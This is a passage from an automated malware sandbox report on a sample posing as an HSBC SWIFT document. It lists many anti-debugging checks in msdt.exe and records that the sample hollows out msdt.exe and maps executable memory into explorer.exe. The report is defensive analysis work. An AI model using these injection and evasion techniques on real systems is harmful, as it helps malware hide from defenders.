          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054C3D40 mov eax, dword ptr fs:[00000030h]20_2_054C3D40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05437D50 mov eax, dword ptr fs:[00000030h]20_2_05437D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543C577 mov eax, dword ptr fs:[00000030h]20_2_0543C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543C577 mov eax, dword ptr fs:[00000030h]20_2_0543C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541AD30 mov eax, dword ptr fs:[00000030h]20_2_0541AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DE539 mov eax, dword ptr fs:[00000030h]20_2_054DE539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]20_2_05423D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E8D34 mov eax, dword ptr fs:[00000030h]20_2_054E8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0549A537 mov eax, dword ptr fs:[00000030h]20_2_0549A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05444D3B mov eax, dword ptr fs:[00000030h]20_2_05444D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05444D3B mov eax, dword ptr fs:[00000030h]20_2_05444D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05444D3B mov eax, dword ptr fs:[00000030h]20_2_05444D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496DC9 mov eax, dword ptr fs:[00000030h]20_2_05496DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496DC9 mov eax, dword ptr fs:[00000030h]20_2_05496DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496DC9 mov eax, dword ptr fs:[00000030h]20_2_05496DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496DC9 mov ecx, dword ptr fs:[00000030h]20_2_05496DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496DC9 mov eax, dword ptr fs:[00000030h]20_2_05496DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496DC9 mov eax, dword ptr fs:[00000030h]20_2_05496DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542D5E0 mov eax, dword ptr fs:[00000030h]20_2_0542D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542D5E0 mov eax, dword ptr fs:[00000030h]20_2_0542D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DFDE2 mov eax, dword ptr fs:[00000030h]20_2_054DFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DFDE2 mov eax, dword ptr fs:[00000030h]20_2_054DFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DFDE2 mov eax, dword ptr fs:[00000030h]20_2_054DFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DFDE2 mov eax, dword ptr fs:[00000030h]20_2_054DFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054C8DF1 mov eax, dword ptr fs:[00000030h]20_2_054C8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05442581 mov eax, dword ptr fs:[00000030h]20_2_05442581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05442581 mov eax, dword ptr fs:[00000030h]20_2_05442581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05442581 mov eax, dword ptr fs:[00000030h]20_2_05442581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05442581 mov eax, dword ptr fs:[00000030h]20_2_05442581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05412D8A mov eax, dword ptr fs:[00000030h]20_2_05412D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05412D8A mov eax, dword ptr fs:[00000030h]20_2_05412D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05412D8A mov eax, dword ptr fs:[00000030h]20_2_05412D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05412D8A mov eax, dword ptr fs:[00000030h]20_2_05412D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05412D8A mov eax, dword ptr fs:[00000030h]20_2_05412D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544FD9B mov eax, dword ptr fs:[00000030h]20_2_0544FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544FD9B mov eax, dword ptr fs:[00000030h]20_2_0544FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E05AC mov eax, dword ptr fs:[00000030h]20_2_054E05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E05AC mov eax, dword ptr fs:[00000030h]20_2_054E05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054435A1 mov eax, dword ptr fs:[00000030h]20_2_054435A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05441DB5 mov eax, dword ptr fs:[00000030h]20_2_05441DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05441DB5 mov eax, dword ptr fs:[00000030h]20_2_05441DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05441DB5 mov eax, dword ptr fs:[00000030h]20_2_05441DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544A44B mov eax, dword ptr fs:[00000030h]20_2_0544A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AC450 mov eax, dword ptr fs:[00000030h]20_2_054AC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AC450 mov eax, dword ptr fs:[00000030h]20_2_054AC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543746D mov eax, dword ptr fs:[00000030h]20_2_0543746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E740D mov eax, dword ptr fs:[00000030h]20_2_054E740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E740D mov eax, dword ptr fs:[00000030h]20_2_054E740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E740D mov eax, dword ptr fs:[00000030h]20_2_054E740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496C0A mov eax, dword ptr fs:[00000030h]20_2_05496C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496C0A mov eax, dword ptr fs:[00000030h]20_2_05496C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496C0A mov eax, dword ptr fs:[00000030h]20_2_05496C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496C0A mov eax, dword ptr fs:[00000030h]20_2_05496C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]20_2_054D1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544BC2C mov eax, dword ptr fs:[00000030h]20_2_0544BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E8CD6 mov eax, dword ptr fs:[00000030h]20_2_054E8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D14FB mov eax, dword ptr fs:[00000030h]20_2_054D14FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496CF0 mov eax, dword ptr fs:[00000030h]20_2_05496CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496CF0 mov eax, dword ptr fs:[00000030h]20_2_05496CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05496CF0 mov eax, dword ptr fs:[00000030h]20_2_05496CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542849B mov eax, dword ptr fs:[00000030h]20_2_0542849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542EF40 mov eax, dword ptr fs:[00000030h]20_2_0542EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542FF60 mov eax, dword ptr fs:[00000030h]20_2_0542FF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E8F6A mov eax, dword ptr fs:[00000030h]20_2_054E8F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E070D mov eax, dword ptr fs:[00000030h]20_2_054E070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E070D mov eax, dword ptr fs:[00000030h]20_2_054E070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544A70E mov eax, dword ptr fs:[00000030h]20_2_0544A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544A70E mov eax, dword ptr fs:[00000030h]20_2_0544A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543F716 mov eax, dword ptr fs:[00000030h]20_2_0543F716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AFF10 mov eax, dword ptr fs:[00000030h]20_2_054AFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AFF10 mov eax, dword ptr fs:[00000030h]20_2_054AFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05414F2E mov eax, dword ptr fs:[00000030h]20_2_05414F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05414F2E mov eax, dword ptr fs:[00000030h]20_2_05414F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544E730 mov eax, dword ptr fs:[00000030h]20_2_0544E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054537F5 mov eax, dword ptr fs:[00000030h]20_2_054537F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05428794 mov eax, dword ptr fs:[00000030h]20_2_05428794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05497794 mov eax, dword ptr fs:[00000030h]20_2_05497794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05497794 mov eax, dword ptr fs:[00000030h]20_2_05497794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05497794 mov eax, dword ptr fs:[00000030h]20_2_05497794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]20_2_05427E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]20_2_05427E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]20_2_05427E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]20_2_05427E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]20_2_05427E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]20_2_05427E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DAE44 mov eax, dword ptr fs:[00000030h]20_2_054DAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054DAE44 mov eax, dword ptr fs:[00000030h]20_2_054DAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542766D mov eax, dword ptr fs:[00000030h]20_2_0542766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543AE73 mov eax, dword ptr fs:[00000030h]20_2_0543AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543AE73 mov eax, dword ptr fs:[00000030h]20_2_0543AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543AE73 mov eax, dword ptr fs:[00000030h]20_2_0543AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543AE73 mov eax, dword ptr fs:[00000030h]20_2_0543AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543AE73 mov eax, dword ptr fs:[00000030h]20_2_0543AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541C600 mov eax, dword ptr fs:[00000030h]20_2_0541C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541C600 mov eax, dword ptr fs:[00000030h]20_2_0541C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541C600 mov eax, dword ptr fs:[00000030h]20_2_0541C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05448E00 mov eax, dword ptr fs:[00000030h]20_2_05448E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D1608 mov eax, dword ptr fs:[00000030h]20_2_054D1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544A61C mov eax, dword ptr fs:[00000030h]20_2_0544A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544A61C mov eax, dword ptr fs:[00000030h]20_2_0544A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541E620 mov eax, dword ptr fs:[00000030h]20_2_0541E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054CFE3F mov eax, dword ptr fs:[00000030h]20_2_054CFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05458EC7 mov eax, dword ptr fs:[00000030h]20_2_05458EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054436CC mov eax, dword ptr fs:[00000030h]20_2_054436CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054CFEC0 mov eax, dword ptr fs:[00000030h]20_2_054CFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E8ED6 mov eax, dword ptr fs:[00000030h]20_2_054E8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054276E2 mov eax, dword ptr fs:[00000030h]20_2_054276E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054416E0 mov ecx, dword ptr fs:[00000030h]20_2_054416E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AFE87 mov eax, dword ptr fs:[00000030h]20_2_054AFE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E0EA5 mov eax, dword ptr fs:[00000030h]20_2_054E0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E0EA5 mov eax, dword ptr fs:[00000030h]20_2_054E0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E0EA5 mov eax, dword ptr fs:[00000030h]20_2_054E0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054946A7 mov eax, dword ptr fs:[00000030h]20_2_054946A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543B944 mov eax, dword ptr fs:[00000030h]20_2_0543B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543B944 mov eax, dword ptr fs:[00000030h]20_2_0543B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541C962 mov eax, dword ptr fs:[00000030h]20_2_0541C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541B171 mov eax, dword ptr fs:[00000030h]20_2_0541B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541B171 mov eax, dword ptr fs:[00000030h]20_2_0541B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05419100 mov eax, dword ptr fs:[00000030h]20_2_05419100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05419100 mov eax, dword ptr fs:[00000030h]20_2_05419100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05419100 mov eax, dword ptr fs:[00000030h]20_2_05419100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05434120 mov eax, dword ptr fs:[00000030h]20_2_05434120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05434120 mov eax, dword ptr fs:[00000030h]20_2_05434120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05434120 mov eax, dword ptr fs:[00000030h]20_2_05434120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05434120 mov eax, dword ptr fs:[00000030h]20_2_05434120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05434120 mov ecx, dword ptr fs:[00000030h]20_2_05434120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544513A mov eax, dword ptr fs:[00000030h]20_2_0544513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544513A mov eax, dword ptr fs:[00000030h]20_2_0544513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541B1E1 mov eax, dword ptr fs:[00000030h]20_2_0541B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541B1E1 mov eax, dword ptr fs:[00000030h]20_2_0541B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0541B1E1 mov eax, dword ptr fs:[00000030h]20_2_0541B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054A41E8 mov eax, dword ptr fs:[00000030h]20_2_054A41E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543C182 mov eax, dword ptr fs:[00000030h]20_2_0543C182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544A185 mov eax, dword ptr fs:[00000030h]20_2_0544A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05442990 mov eax, dword ptr fs:[00000030h]20_2_05442990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054461A0 mov eax, dword ptr fs:[00000030h]20_2_054461A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054461A0 mov eax, dword ptr fs:[00000030h]20_2_054461A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D49A4 mov eax, dword ptr fs:[00000030h]20_2_054D49A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D49A4 mov eax, dword ptr fs:[00000030h]20_2_054D49A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D49A4 mov eax, dword ptr fs:[00000030h]20_2_054D49A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D49A4 mov eax, dword ptr fs:[00000030h]20_2_054D49A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054969A6 mov eax, dword ptr fs:[00000030h]20_2_054969A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054951BE mov eax, dword ptr fs:[00000030h]20_2_054951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054951BE mov eax, dword ptr fs:[00000030h]20_2_054951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054951BE mov eax, dword ptr fs:[00000030h]20_2_054951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054951BE mov eax, dword ptr fs:[00000030h]20_2_054951BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov eax, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov eax, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov eax, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054399BF mov eax, dword ptr fs:[00000030h]20_2_054399BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05430050 mov eax, dword ptr fs:[00000030h]20_2_05430050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05430050 mov eax, dword ptr fs:[00000030h]20_2_05430050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E1074 mov eax, dword ptr fs:[00000030h]20_2_054E1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054D2073 mov eax, dword ptr fs:[00000030h]20_2_054D2073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E4015 mov eax, dword ptr fs:[00000030h]20_2_054E4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054E4015 mov eax, dword ptr fs:[00000030h]20_2_054E4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05497016 mov eax, dword ptr fs:[00000030h]20_2_05497016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05497016 mov eax, dword ptr fs:[00000030h]20_2_05497016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05497016 mov eax, dword ptr fs:[00000030h]20_2_05497016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542B02A mov eax, dword ptr fs:[00000030h]20_2_0542B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542B02A mov eax, dword ptr fs:[00000030h]20_2_0542B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542B02A mov eax, dword ptr fs:[00000030h]20_2_0542B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0542B02A mov eax, dword ptr fs:[00000030h]20_2_0542B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544002D mov eax, dword ptr fs:[00000030h]20_2_0544002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544002D mov eax, dword ptr fs:[00000030h]20_2_0544002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544002D mov eax, dword ptr fs:[00000030h]20_2_0544002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544002D mov eax, dword ptr fs:[00000030h]20_2_0544002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0544002D mov eax, dword ptr fs:[00000030h]20_2_0544002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543A830 mov eax, dword ptr fs:[00000030h]20_2_0543A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543A830 mov eax, dword ptr fs:[00000030h]20_2_0543A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543A830 mov eax, dword ptr fs:[00000030h]20_2_0543A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_0543A830 mov eax, dword ptr fs:[00000030h]20_2_0543A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AB8D0 mov eax, dword ptr fs:[00000030h]20_2_054AB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AB8D0 mov ecx, dword ptr fs:[00000030h]20_2_054AB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AB8D0 mov eax, dword ptr fs:[00000030h]20_2_054AB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AB8D0 mov eax, dword ptr fs:[00000030h]20_2_054AB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AB8D0 mov eax, dword ptr fs:[00000030h]20_2_054AB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054AB8D0 mov eax, dword ptr fs:[00000030h]20_2_054AB8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00409B30 LdrLoadDll,8_2_00409B30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: F60000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
